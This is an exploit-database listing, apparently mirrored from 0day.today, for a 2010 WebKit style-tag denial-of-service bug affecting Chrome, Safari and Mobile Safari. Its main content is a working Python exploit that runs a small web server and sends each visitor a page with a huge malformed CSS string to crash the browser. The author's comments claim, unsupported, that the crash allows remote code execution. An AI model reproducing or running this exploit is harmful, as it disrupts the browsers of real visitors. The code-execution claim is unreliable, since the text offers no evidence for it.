Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebKit Style Tag Remote Denial of Service Vulnerability

🗓️ 07 Mar 2010 00:00:00Reported by SneakType 
zdt
 zdt🔗 0day.today👁 14 Views

WebKit Style Tag Remote Denial of Service Vulnerability in Chrome and Safar

Code
=======================================================
WebKit Style Tag Remote Denial of Service Vulnerability
=======================================================

Vulnerable:  	 WebKit Open Source Project WebKit 0

Google Chrome 4.0.249 .89
Google Chrome 4.0.249 .78
Apple Safari 4.0.4 for Windows
Apple Safari 4.0.4
Apple Mobile Safari 0

+ Apple Mac OS X 10.4.2
+ Apple Mac OS X 10.4.2
+ Apple Mac OS X 10.4.1
+ Apple Mac OS X 10.4.1
+ Apple Mac OS X 10.4
+ Apple Mac OS X 10.4
+ Apple Mac OS X Server 10.4.2
+ Apple Mac OS X Server 10.4.1
+ Apple Mac OS X Server 10.4.1
+ Apple Mac OS X Server 10.4
+ Apple Mac OS X Server 10.4 

Exploit code:


#!/usr/bin/python
#                       ,
#                      dM
#                      MMr
#                     4MMML                  .
#                     MMMMM.                xf
#     .              "M6MMM               .MM-
#      Mh..          +MM5MMM            .MMMM
#      .MMM.         .MMMMML.          MMMMMh
#       )MMMh.        MM5MMM         MMMMMMM
#        3MMMMx.     'MMM3MMf      xnMMMMMM"
#        '*MMMMM      MMMMMM.     nMMMMMMP"
#          *MMMMMx    "MMM5M\    .MMMMMMM=
#           *MMMMMh   "MMMMM"   JMMMMMMP
#             MMMMMM   GMMMM.  dMMMMMM            .
#              MMMMMM  "MMMM  .MMMMM(        .nnMP"
#   ..          *MMMMx  MMM"  dMMMM"    .nnMMMMM*
#    "MMn...     'MMMMr 'MM   MMM"   .nMMMMMMM*"
#     "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM""
#       ^MMMMMMMMx.  *ML "M .M*  .MMMMMM**"
#          *PMMMMMMhn. *x > M  .MMMM**""
#             ""**MMMMhx/.h/ .=*"
#                      .3P"%....
#             [t12]  nP"     "*MMnx
 
#           SMOKE WEED
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
#this is a remote crash bug, hoever an analysis of the debug dump shows remote code execution capability, I am just lazy
 
import sys, socket;
 
def main():
    junk = "*>" * 120000;
     
    html = """
        <html>
        <head>
        <style type="text/css">
        """;
 
    html += junk;
 
    html += """
        body {background: blue;}
        </style>
        </head>
        </html>
        """;
 
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    s.bind(('',2121));
    s.listen(1);
     
    while True:
        channel, details = s.accept();
        print channel.recv(1024);
        channel.send(html);
        channel.close();
 
main();




#  0day.today [2018-01-02]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2010 00:00Current
7.1High risk
Vulners AI Score7.1
webkit open source projectchrome 4.0.249safari 4.0.4windowsapple mac os xserver 10.4exploitremote denial of service
14